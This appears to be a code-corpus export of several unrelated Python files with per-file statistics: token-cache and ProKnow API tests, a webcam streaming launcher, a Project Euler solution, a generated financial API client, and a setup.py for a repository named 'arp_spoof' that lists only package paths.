mock_cached_token.assert_called_once()
@mock.patch.object(TokenClient, "cached_token")
@mock.patch.object(TokenClient, "fresh_token")
def test_multiple_audiences(
mock_fresh_token,
mock_cached_token,
oauth_token_cache_instance,
audience,
make_token,
):
"""No token in local cache, add tokens for two different audiences and check correct caching."""
first_token = make_token(access_token="first")
second_token = make_token(access_token="second")
mock_cached_token.return_value = first_token
for i in range(3):
assert oauth_token_cache_instance.token(audience="first") == first_token
mock_cached_token.return_value = second_token
for i in range(3):
assert oauth_token_cache_instance.token(audience="second") == second_token
mock_cached_token.return_value = None
assert oauth_token_cache_instance.token(audience="first") == first_token
assert oauth_token_cache_instance.token(audience="second") == second_token
mock_fresh_token.assert_not_called()
assert mock_cached_token.call_count == 2
| 29.686667
| 111
| 0.751628
| 611
| 4,453
| 5.130933
| 0.11784
| 0.077512
| 0.090909
| 0.124721
| 0.873046
| 0.839553
| 0.821691
| 0.792345
| 0.792345
| 0.752791
| 0
| 0.001611
| 0.16371
| 4,453
| 149
| 112
| 29.885906
| 0.840226
| 0.159668
| 0
| 0.823529
| 0
| 0
| 0.046367
| 0
| 0
| 0
| 0
| 0
| 0.205882
| 1
| 0.058824
| false
| 0
| 0.029412
| 0
| 0.088235
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4d16583016bae02b06c3a545d2010854f5bf2157
| 179
|
py
|
Python
|
faceRequest/mjpgweb.py
|
gateaunet/facerecogapi
|
1f25ef9e1d0ef95c507410bae2268d146934985f
|
[
"Apache-2.0"
] | null | null | null |
faceRequest/mjpgweb.py
|
gateaunet/facerecogapi
|
1f25ef9e1d0ef95c507410bae2268d146934985f
|
[
"Apache-2.0"
] | null | null | null |
faceRequest/mjpgweb.py
|
gateaunet/facerecogapi
|
1f25ef9e1d0ef95c507410bae2268d146934985f
|
[
"Apache-2.0"
] | null | null | null |
import os
import sys
def onWebcam():
os.system('mjpg_streamer -i "input_uvc.so" -o "output_http.so -p 8090 -w /usr/local/share/mjpg-streamer/www/"') # start mjpgstreamer
| 17.9
| 136
| 0.703911
| 29
| 179
| 4.241379
| 0.827586
| 0.195122
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.026316
| 0.150838
| 179
| 9
| 137
| 19.888889
| 0.782895
| 0.100559
| 0
| 0
| 0
| 0.25
| 0.628205
| 0.230769
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0.5
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
4d5858acc7df1ee7b69685d779b85f846c0db87e
| 5,665
|
py
|
Python
|
tests/collections/test_collection_patients.py
|
proknow/proknow-python
|
c4ca0be6f606db655b711d3490febdec9c139570
|
[
"MIT"
] | 2
|
2019-03-16T21:41:45.000Z
|
2022-02-09T16:01:58.000Z
|
tests/collections/test_collection_patients.py
|
proknow/proknow-python
|
c4ca0be6f606db655b711d3490febdec9c139570
|
[
"MIT"
] | 7
|
2019-02-25T15:04:30.000Z
|
2021-12-13T15:15:38.000Z
|
tests/collections/test_collection_patients.py
|
proknow/proknow-python
|
c4ca0be6f606db655b711d3490febdec9c139570
|
[
"MIT"
] | 3
|
2020-07-10T14:18:55.000Z
|
2021-09-14T09:47:41.000Z
|
import pytest
import os
from proknow import Exceptions
def test_collection_patients(app, workspace_generator, collection_generator):
pk = app.pk
_, workspace = workspace_generator()
batch = pk.uploads.upload(workspace.id, "./data/Becker^Matthew")
path = os.path.abspath("./data/Becker^Matthew/HNC0522c0009_Plan1.dcm")
patient_summary = batch.find_patient(path)
entity_summary = batch.find_entity(path)
# Create workspace collection
_, collection = collection_generator(type="workspace", workspaces=[workspace.id])
# Verify collection is empty
patients = collection.patients.query()
assert len(patients) == 0
# Verify patient added to the collection
collection.patients.add(workspace.id, [{
"patient": patient_summary.id,
"entity": entity_summary.id,
}])
patients = collection.patients.query()
assert len(patients) == 1
patient = patients[0]
assert patient.id == patient_summary.id
assert patient.entity_id == entity_summary.id
assert isinstance(patient.data, dict)
# Verify patient is removed from collection
collection.patients.remove(workspace.id, [{
"patient": patient_summary.id
}])
patients = collection.patients.query()
assert len(patients) == 0
# Verify patient without representative entity is added to the collection
collection.patients.add(workspace.id, [{
"patient": patient_summary.id
}])
patients = collection.patients.query()
assert len(patients) == 1
patient = patients[0]
assert patient.id == patient_summary.id
assert patient.entity_id is None
assert isinstance(patient.data, dict)
# Verify patient is removed from collection
collection.patients.remove(workspace.id, [{
"patient": patient_summary.id
}])
patients = collection.patients.query()
assert len(patients) == 0
# Create organization collection
_, collection = collection_generator(workspaces=[workspace.id])
# Verify collection is empty
patients = collection.patients.query()
assert len(patients) == 0
# Verify patient added to the collection
collection.patients.add(workspace.id, [{
"patient": patient_summary.id,
"entity": entity_summary.id,
}])
patients = collection.patients.query()
assert len(patients) == 1
patient = patients[0]
assert patient.id == patient_summary.id
assert patient.entity_id == entity_summary.id
assert isinstance(patient.data, dict)
# Verify patient is removed from collection
collection.patients.remove(workspace.id, [{
"patient": patient_summary.id
}])
patients = collection.patients.query()
assert len(patients) == 0
# Verify patient without representative entity is added to the collection
collection.patients.add(workspace.id, [{
"patient": patient_summary.id
}])
patients = collection.patients.query()
assert len(patients) == 1
patient = patients[0]
assert patient.id == patient_summary.id
assert patient.entity_id is None
assert isinstance(patient.data, dict)
# Verify patient is removed from collection
collection.patients.remove(workspace.id, [{
"patient": patient_summary.id
}])
patients = collection.patients.query()
assert len(patients) == 0
def test_collection_patients_query(app, workspace_generator, collection_generator):
pk = app.pk
_, workspace = workspace_generator()
_, collection = collection_generator(workspaces=[workspace.id])
collection = pk.collections.find(workspace=workspace.id, id=collection.id).get()
patients = collection.patients.query()
assert len(patients) == 0
def test_collection_patients_failure(app, workspace_generator, collection_generator):
pk = app.pk
_, workspace = workspace_generator()
_, collection = collection_generator(workspaces=[workspace.id])
batch = pk.uploads.upload(workspace.id, "./data/Becker^Matthew")
path = os.path.abspath("./data/Becker^Matthew/HNC0522c0009_Plan1.dcm")
patient_summary = batch.find_patient(path)
entity_summary = batch.find_entity(path)
# Assert exception is raised
with pytest.raises(Exceptions.WorkspaceLookupError) as err_wrapper:
collection.patients.add("Does Not Exist", [{
"patient": patient_summary.id,
"entity": entity_summary.id,
}])
assert err_wrapper.value.message == 'Workspace with name `Does Not Exist` not found.'
# Assert exception is raised
with pytest.raises(Exceptions.WorkspaceLookupError) as err_wrapper:
collection.patients.remove("Does Not Exist", [{
"patient": patient_summary.id,
}])
assert err_wrapper.value.message == 'Workspace with name `Does Not Exist` not found.'
def test_collection_patients_get(app, workspace_generator, collection_generator):
pk = app.pk
_, workspace = workspace_generator()
_, collection = collection_generator(workspaces=[workspace.id])
batch = pk.uploads.upload(workspace.id, "./data/Becker^Matthew")
path = os.path.abspath("./data/Becker^Matthew/HNC0522c0009_Plan1.dcm")
patient_summary = batch.find_patient(path)
entity_summary = batch.find_entity(path)
collection.patients.add(workspace.id, [{
"patient": patient_summary.id,
"entity": entity_summary.id,
}])
# Verify correct patient information is returned
patients = collection.patients.query()
patient = patients[0].get()
assert patient.id == patient_summary.id
assert patient.mrn == patient_summary.data["mrn"]
assert patient.name == patient_summary.data["name"]
| 36.082803
| 89
| 0.702383
| 648
| 5,665
| 6.010802
| 0.115741
| 0.124775
| 0.065725
| 0.095507
| 0.888575
| 0.888575
| 0.88113
| 0.871374
| 0.851091
| 0.851091
| 0
| 0.009368
| 0.189762
| 5,665
| 156
| 90
| 36.314103
| 0.839216
| 0.106443
| 0
| 0.880342
| 0
| 0
| 0.086009
| 0.038644
| 0
| 0
| 0
| 0
| 0.239316
| 1
| 0.034188
| false
| 0
| 0.025641
| 0
| 0.059829
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4dcd6e086423664e177ff924138ae01d10955388
| 1,388
|
py
|
Python
|
ProjectEuler/python/prob8.py
|
yuriyshapovalov/Prototypes
|
1fc4af4434440a8f59a4bcb486e79fd53d199a7d
|
[
"Apache-2.0"
] | null | null | null |
ProjectEuler/python/prob8.py
|
yuriyshapovalov/Prototypes
|
1fc4af4434440a8f59a4bcb486e79fd53d199a7d
|
[
"Apache-2.0"
] | 1
|
2015-03-25T22:35:52.000Z
|
2015-03-25T22:35:52.000Z
|
ProjectEuler/python/prob8.py
|
yuriyshapovalov/Prototypes
|
1fc4af4434440a8f59a4bcb486e79fd53d199a7d
|
[
"Apache-2.0"
] | null | null | null |
# projecteuler.net/problem=8
num = "7316717653133062491922511967442657474235534919493496983520312774506326239578318016984801869478851843858615607891129494954595017379583319528532088055111254069874715852386305071569329096329522744304355766896648950445244523161731856403098711121722383113622298934233803081353362766142828064444866452387493035890729629049156044077239071381051585930796086670172427121883998797908792274921901699720888093776657273330010533678812202354218097512545405947522435258490771167055601360483958644670632441572215539753697817977846174064955149290862569321978468622482839722413756570560574902614079729686524145351004748216637048440319989000889524345065854122758866688116427171479924442928230863465674813919123162824586178664583591245665294765456828489128831426076900422421902267105562632111110937054421750694165896040807198403850962455444362981230987879927244284909188845801561660979191338754992005240636899125607176060588611646710940507754100225698315520005593572972571636269561882670428252483600823257530420752963450"
def main():
ans = LargeProductInSeries()
print(ans)
def LargeProductInSeries():
res = []
for i in range(0, len(num)-4):
res.append(ProductDigits(num[i:i+5]))
return sorted(res)
def ProductDigits(n):
return int(n[0])*int(n[1])*int(n[2])*int(n[3])*int(n[4])
if __name__ == '__main__':
main()
| 69.4
| 1,009
| 0.880403
| 56
| 1,388
| 21.678571
| 0.553571
| 0.016474
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.779151
| 0.067003
| 1,388
| 19
| 1,010
| 73.052632
| 0.158301
| 0.018732
| 0
| 0
| 0
| 0
| 0.751678
| 0.745712
| 0
| 1
| 0
| 0
| 0
| 1
| 0.230769
| false
| 0
| 0
| 0.076923
| 0.384615
| 0.076923
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
4df5f00e2e198ea2cf9ddb64ae1d35f5fb3d911b
| 32
|
py
|
Python
|
Python/Tests/TestData/Repl/Program.py
|
nanshuiyu/pytools
|
9f9271fe8cf564b4f94e9456d400f4306ea77c23
|
[
"Apache-2.0"
] | null | null | null |
Python/Tests/TestData/Repl/Program.py
|
nanshuiyu/pytools
|
9f9271fe8cf564b4f94e9456d400f4306ea77c23
|
[
"Apache-2.0"
] | null | null | null |
Python/Tests/TestData/Repl/Program.py
|
nanshuiyu/pytools
|
9f9271fe8cf564b4f94e9456d400f4306ea77c23
|
[
"Apache-2.0"
] | null | null | null |
def f():
return 42
100
| 6.4
| 14
| 0.46875
| 5
| 32
| 3
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.277778
| 0.4375
| 32
| 4
| 15
| 8
| 0.555556
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0
| 0.333333
| 0.666667
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 8
|
129927284737b6a797a0fb94493c93c97da6daa9
| 13,892
|
py
|
Python
|
atom/proton/python/proton_api/api/util_api.py
|
AbhiGupta03/SDK
|
f3a61aae7a847f07f0c22a154ca88dc378e9d25e
|
[
"Apache-2.0"
] | 11
|
2019-04-16T02:11:17.000Z
|
2021-12-16T22:51:40.000Z
|
atom/proton/python/proton_api/api/util_api.py
|
AbhiGupta03/SDK
|
f3a61aae7a847f07f0c22a154ca88dc378e9d25e
|
[
"Apache-2.0"
] | 81
|
2019-11-19T23:24:28.000Z
|
2022-03-28T11:35:47.000Z
|
atom/proton/python/proton_api/api/util_api.py
|
AbhiGupta03/SDK
|
f3a61aae7a847f07f0c22a154ca88dc378e9d25e
|
[
"Apache-2.0"
] | 11
|
2020-07-08T02:29:56.000Z
|
2022-03-28T10:05:33.000Z
|
# coding: utf-8
"""
Hydrogen Proton API
Financial engineering module of Hydrogen Atom # noqa: E501
OpenAPI spec version: 1.9.2
Contact: info@hydrogenplatform.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from proton_api.api_client import ApiClient
class UtilApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def decision_tree_result(self, decision_tree_result_request, **kwargs): # noqa: E501
"""Decision Tree Result # noqa: E501
Traverse a decision tree and find the resulting leaf node # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.decision_tree_result(decision_tree_result_request, async_req=True)
>>> result = thread.get()
:param async_req bool
:param DecisionTreeResultRequest decision_tree_result_request: Request payload for Decision Tree Result (required)
:return: dict(str, object)
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.decision_tree_result_with_http_info(decision_tree_result_request, **kwargs) # noqa: E501
else:
(data) = self.decision_tree_result_with_http_info(decision_tree_result_request, **kwargs) # noqa: E501
return data
def decision_tree_result_with_http_info(self, decision_tree_result_request, **kwargs): # noqa: E501
"""Decision Tree Result # noqa: E501
Traverse a decision tree and find the resulting leaf node # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.decision_tree_result_with_http_info(decision_tree_result_request, async_req=True)
>>> result = thread.get()
:param async_req bool
:param DecisionTreeResultRequest decision_tree_result_request: Request payload for Decision Tree Result (required)
:return: dict(str, object)
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['decision_tree_result_request'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method decision_tree_result" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'decision_tree_result_request' is set
if self.api_client.client_side_validation and ('decision_tree_result_request' not in params or
params['decision_tree_result_request'] is None): # noqa: E501
raise ValueError("Missing the required parameter `decision_tree_result_request` when calling `decision_tree_result`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'decision_tree_result_request' in params:
body_params = params['decision_tree_result_request']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/decision_tree_result', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='dict(str, object)', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def order_rebalance(self, order_rebalance_request, **kwargs): # noqa: E501
"""Order Rebalance # noqa: E501
Create orders to rebalance client accounts or portfolios # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.order_rebalance(order_rebalance_request, async_req=True)
>>> result = thread.get()
:param async_req bool
:param OrderRebalanceRequest order_rebalance_request: Request payload for Order Rebalance (required)
:return: dict(str, object)
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.order_rebalance_with_http_info(order_rebalance_request, **kwargs) # noqa: E501
else:
(data) = self.order_rebalance_with_http_info(order_rebalance_request, **kwargs) # noqa: E501
return data
def order_rebalance_with_http_info(self, order_rebalance_request, **kwargs): # noqa: E501
"""Order Rebalance # noqa: E501
Create orders to rebalance client accounts or portfolios # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.order_rebalance_with_http_info(order_rebalance_request, async_req=True)
>>> result = thread.get()
:param async_req bool
:param OrderRebalanceRequest order_rebalance_request: Request payload for Order Rebalance (required)
:return: dict(str, object)
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['order_rebalance_request'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method order_rebalance" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'order_rebalance_request' is set
if self.api_client.client_side_validation and ('order_rebalance_request' not in params or
params['order_rebalance_request'] is None): # noqa: E501
raise ValueError("Missing the required parameter `order_rebalance_request` when calling `order_rebalance`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'order_rebalance_request' in params:
body_params = params['order_rebalance_request']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/order_rebalance', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='dict(str, object)', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def performance_calculator(self, performance_calculator_request, **kwargs): # noqa: E501
"""Performance Calculator # noqa: E501
Calculate performance/risk metrics for a Nucleus entity # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.performance_calculator(performance_calculator_request, async_req=True)
>>> result = thread.get()
:param async_req bool
:param PerformanceCalculatorRequest performance_calculator_request: Request payload for Performance Calculator (required)
:return: dict(str, object)
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.performance_calculator_with_http_info(performance_calculator_request, **kwargs) # noqa: E501
else:
(data) = self.performance_calculator_with_http_info(performance_calculator_request, **kwargs) # noqa: E501
return data
def performance_calculator_with_http_info(self, performance_calculator_request, **kwargs): # noqa: E501
"""Performance Calculator # noqa: E501
Calculate performance/risk metrics for a Nucleus entity # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.performance_calculator_with_http_info(performance_calculator_request, async_req=True)
>>> result = thread.get()
:param async_req bool
:param PerformanceCalculatorRequest performance_calculator_request: Request payload for Performance Calculator (required)
:return: dict(str, object)
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['performance_calculator_request'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method performance_calculator" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'performance_calculator_request' is set
if self.api_client.client_side_validation and ('performance_calculator_request' not in params or
params['performance_calculator_request'] is None): # noqa: E501
raise ValueError("Missing the required parameter `performance_calculator_request` when calling `performance_calculator`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'performance_calculator_request' in params:
body_params = params['performance_calculator_request']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/performance_calculator', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='dict(str, object)', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 41.843373
| 147
| 0.641232
| 1,552
| 13,892
| 5.458763
| 0.112758
| 0.04627
| 0.05949
| 0.044263
| 0.894122
| 0.878659
| 0.845019
| 0.823536
| 0.820703
| 0.820703
| 0
| 0.015854
| 0.278074
| 13,892
| 331
| 148
| 41.969789
| 0.828896
| 0.345595
| 0
| 0.719298
| 1
| 0
| 0.201044
| 0.095125
| 0
| 0
| 0
| 0
| 0
| 1
| 0.040936
| false
| 0
| 0.023392
| 0
| 0.122807
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
423f317c9fd6c56f2dc721d8472f1c91421c84e9
| 6,145
|
py
|
Python
|
setup.py
|
SebOh/arp_spoof
|
9c4493c9bc7b80f70710d7e4a644b102f0bd8c4d
|
[
"MIT"
] | null | null | null |
setup.py
|
SebOh/arp_spoof
|
9c4493c9bc7b80f70710d7e4a644b102f0bd8c4d
|
[
"MIT"
] | null | null | null |
setup.py
|
SebOh/arp_spoof
|
9c4493c9bc7b80f70710d7e4a644b102f0bd8c4d
|
[
"MIT"
] | null | null | null |
from setuptools import setup
setup(
name='arp_spoof',
version='',
packages=['venv.Lib.site-packages.pip', 'venv.Lib.site-packages.pip._vendor',
'venv.Lib.site-packages.pip._vendor.idna', 'venv.Lib.site-packages.pip._vendor.pep517',
'venv.Lib.site-packages.pip._vendor.pytoml', 'venv.Lib.site-packages.pip._vendor.certifi',
'venv.Lib.site-packages.pip._vendor.chardet', 'venv.Lib.site-packages.pip._vendor.chardet.cli',
'venv.Lib.site-packages.pip._vendor.distlib', 'venv.Lib.site-packages.pip._vendor.distlib._backport',
'venv.Lib.site-packages.pip._vendor.msgpack', 'venv.Lib.site-packages.pip._vendor.urllib3',
'venv.Lib.site-packages.pip._vendor.urllib3.util', 'venv.Lib.site-packages.pip._vendor.urllib3.contrib',
'venv.Lib.site-packages.pip._vendor.urllib3.contrib._securetransport',
'venv.Lib.site-packages.pip._vendor.urllib3.packages',
'venv.Lib.site-packages.pip._vendor.urllib3.packages.backports',
'venv.Lib.site-packages.pip._vendor.urllib3.packages.ssl_match_hostname',
'venv.Lib.site-packages.pip._vendor.colorama', 'venv.Lib.site-packages.pip._vendor.html5lib',
'venv.Lib.site-packages.pip._vendor.html5lib._trie',
'venv.Lib.site-packages.pip._vendor.html5lib.filters',
'venv.Lib.site-packages.pip._vendor.html5lib.treewalkers',
'venv.Lib.site-packages.pip._vendor.html5lib.treeadapters',
'venv.Lib.site-packages.pip._vendor.html5lib.treebuilders', 'venv.Lib.site-packages.pip._vendor.lockfile',
'venv.Lib.site-packages.pip._vendor.progress', 'venv.Lib.site-packages.pip._vendor.requests',
'venv.Lib.site-packages.pip._vendor.packaging', 'venv.Lib.site-packages.pip._vendor.cachecontrol',
'venv.Lib.site-packages.pip._vendor.cachecontrol.caches',
'venv.Lib.site-packages.pip._vendor.webencodings', 'venv.Lib.site-packages.pip._vendor.pkg_resources',
'venv.Lib.site-packages.pip._internal', 'venv.Lib.site-packages.pip._internal.cli',
'venv.Lib.site-packages.pip._internal.req', 'venv.Lib.site-packages.pip._internal.vcs',
'venv.Lib.site-packages.pip._internal.utils', 'venv.Lib.site-packages.pip._internal.models',
'venv.Lib.site-packages.pip._internal.commands', 'venv.Lib.site-packages.pip._internal.operations',
'venv.Lib.site-packages.scapy', 'venv.Lib.site-packages.scapy.arch',
'venv.Lib.site-packages.scapy.arch.bpf', 'venv.Lib.site-packages.scapy.arch.windows',
'venv.Lib.site-packages.scapy.asn1', 'venv.Lib.site-packages.scapy.tools',
'venv.Lib.site-packages.scapy.layers', 'venv.Lib.site-packages.scapy.layers.tls',
'venv.Lib.site-packages.scapy.layers.tls.crypto', 'venv.Lib.site-packages.scapy.contrib',
'venv.Lib.site-packages.scapy.contrib.automotive', 'venv.Lib.site-packages.scapy.contrib.automotive.gm',
'venv.Lib.site-packages.scapy.contrib.automotive.bmw', 'venv.Lib.site-packages.scapy.modules',
'venv.Lib.site-packages.scapy.modules.krack', 'venv.Lib.site-packages.pip-9.0.1-py3.6.egg.pip',
'venv.Lib.site-packages.pip-9.0.1-py3.6.egg.pip.req',
'venv.Lib.site-packages.pip-9.0.1-py3.6.egg.pip.vcs',
'venv.Lib.site-packages.pip-9.0.1-py3.6.egg.pip.utils',
'venv.Lib.site-packages.pip-9.0.1-py3.6.egg.pip.compat',
'venv.Lib.site-packages.pip-9.0.1-py3.6.egg.pip.models',
'venv.Lib.site-packages.pip-9.0.1-py3.6.egg.pip._vendor',
'venv.Lib.site-packages.pip-9.0.1-py3.6.egg.pip._vendor.distlib',
'venv.Lib.site-packages.pip-9.0.1-py3.6.egg.pip._vendor.distlib._backport',
'venv.Lib.site-packages.pip-9.0.1-py3.6.egg.pip._vendor.colorama',
'venv.Lib.site-packages.pip-9.0.1-py3.6.egg.pip._vendor.html5lib',
'venv.Lib.site-packages.pip-9.0.1-py3.6.egg.pip._vendor.html5lib._trie',
'venv.Lib.site-packages.pip-9.0.1-py3.6.egg.pip._vendor.html5lib.filters',
'venv.Lib.site-packages.pip-9.0.1-py3.6.egg.pip._vendor.html5lib.treewalkers',
'venv.Lib.site-packages.pip-9.0.1-py3.6.egg.pip._vendor.html5lib.treeadapters',
'venv.Lib.site-packages.pip-9.0.1-py3.6.egg.pip._vendor.html5lib.treebuilders',
'venv.Lib.site-packages.pip-9.0.1-py3.6.egg.pip._vendor.lockfile',
'venv.Lib.site-packages.pip-9.0.1-py3.6.egg.pip._vendor.progress',
'venv.Lib.site-packages.pip-9.0.1-py3.6.egg.pip._vendor.requests',
'venv.Lib.site-packages.pip-9.0.1-py3.6.egg.pip._vendor.requests.packages',
'venv.Lib.site-packages.pip-9.0.1-py3.6.egg.pip._vendor.requests.packages.chardet',
'venv.Lib.site-packages.pip-9.0.1-py3.6.egg.pip._vendor.requests.packages.urllib3',
'venv.Lib.site-packages.pip-9.0.1-py3.6.egg.pip._vendor.requests.packages.urllib3.util',
'venv.Lib.site-packages.pip-9.0.1-py3.6.egg.pip._vendor.requests.packages.urllib3.contrib',
'venv.Lib.site-packages.pip-9.0.1-py3.6.egg.pip._vendor.requests.packages.urllib3.packages',
'venv.Lib.site-packages.pip-9.0.1-py3.6.egg.pip._vendor.requests.packages.urllib3.packages.ssl_match_hostname',
'venv.Lib.site-packages.pip-9.0.1-py3.6.egg.pip._vendor.packaging',
'venv.Lib.site-packages.pip-9.0.1-py3.6.egg.pip._vendor.cachecontrol',
'venv.Lib.site-packages.pip-9.0.1-py3.6.egg.pip._vendor.cachecontrol.caches',
'venv.Lib.site-packages.pip-9.0.1-py3.6.egg.pip._vendor.webencodings',
'venv.Lib.site-packages.pip-9.0.1-py3.6.egg.pip._vendor.pkg_resources',
'venv.Lib.site-packages.pip-9.0.1-py3.6.egg.pip.commands',
'venv.Lib.site-packages.pip-9.0.1-py3.6.egg.pip.operations'],
url='',
license='',
author='SebastianOhm',
author_email='',
description=''
)
| 79.805195
| 125
| 0.65533
| 900
| 6,145
| 4.387778
| 0.09
| 0.157761
| 0.247911
| 0.42821
| 0.945809
| 0.927577
| 0.767283
| 0.667511
| 0.524183
| 0.413016
| 0
| 0.03774
| 0.167779
| 6,145
| 76
| 126
| 80.855263
| 0.734454
| 0
| 0
| 0
| 0
| 0.44
| 0.769243
| 0.765826
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.013333
| 0
| 0.013333
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
